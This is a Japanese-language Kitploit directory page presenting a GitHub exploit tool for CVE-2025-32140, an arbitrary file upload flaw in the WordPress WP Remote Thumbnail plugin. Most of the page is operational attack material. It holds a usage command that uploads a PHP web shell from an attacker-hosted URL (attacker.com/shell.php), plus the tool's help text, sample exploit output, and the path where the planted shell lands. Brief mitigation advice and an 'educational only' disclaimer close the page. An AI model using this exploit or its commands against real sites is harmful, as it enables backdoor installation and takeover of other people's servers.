Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 は、任意のファイルアップロードの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-32140
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 は、任意のファイルアップロードの脆弱性があります。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-32140 – WP Remote Thumbnail エクスプロイト (任意ファイルアップロード)


📝 説明

CVE-2025-32140 は、WordPress 用 WP Remote Thumbnail プラグインにおける 重大な脆弱性 です。この脆弱性により、認証済み攻撃者(投稿者以上の権限を持つ)は、サニタイズされていない URL を受け付ける欠陥のある機能を悪用して、Web シェル などの 任意のファイル をアップロードできます。

このプラグインは、指定された remote_thumb URL から取得したファイルタイプやコンテンツを検証できません。これにより、攻撃者は悪意のある PHP ファイル(例: バックドア)を /wp-content/uploads ディレクトリに保存できます。


⚠️ 脆弱なコンポーネント

  • プラグイン: WP Remote Thumbnail
  • 影響を受けるバージョン: <= 1.3.2
  • 修正済みバージョン: 未リリース
  • 攻撃経路: ネットワーク
  • 必要な権限: 低 (edit_post 権限を持つ認証済みユーザー)
  • CVSS スコア: 9.9 (重大)

🛠 エクスプロイトスクリプト

この Python スクリプトは、CVE-2025-32140 のエクスプロイトを自動化し、以下の手順を実行します。

  1. ターゲットの WordPress サイトにログインします。
  2. 必要な nonce を自動的に抽出します。
  3. remote_thumb パラメータを介して悪意のあるリクエストを作成し送信します。
  4. Web シェルをターゲットサイトにアップロードします。

🔧 コマンドラインオプション


🚀 使用方法

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 使用方法とヘルプ

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 出力例

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 シェルの場所

エクスプロイトが成功すると、アップロードされた Web シェルは通常、次の場所に保存されます。

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

YYYY/MM をアップロード時の現在の年と月に置き換えてください。


🛡 推奨事項

この脆弱性によるリスクを軽減するには、次の対策を実施してください。

  1. プラグインを最新バージョンに更新する (パッチがリリースされたら)。
  2. ファイルアップロード機能を信頼できるユーザーのみに制限する。
  3. 必要でない場合は、リモートサムネイル取得機能を無効にする。

⚠️ 免責事項

このスクリプトは教育目的のみで提供されています。
作者は、このエクスプロイトによって引き起こされた誤用や損害について一切責任を負いません。


👤 作者

作成者: Nxploited ( Khaled Alenazi ) 🌟

ツールをダウンロード
オプションエイリアス説明
--url-uターゲット WordPress サイトの URL (例: http://target.com/wordpress)
--username-un投稿編集権限を持つ WordPress ユーザー名
--password-p指定したユーザー名のパスワード
--user_ID-uidWordPress ユーザー ID (通常は管理者 1)
--post_ID-pid編集する投稿の ID (下書きでも可)
--shell攻撃者のサーバーでホストされている PHP Web シェルへの直接 URL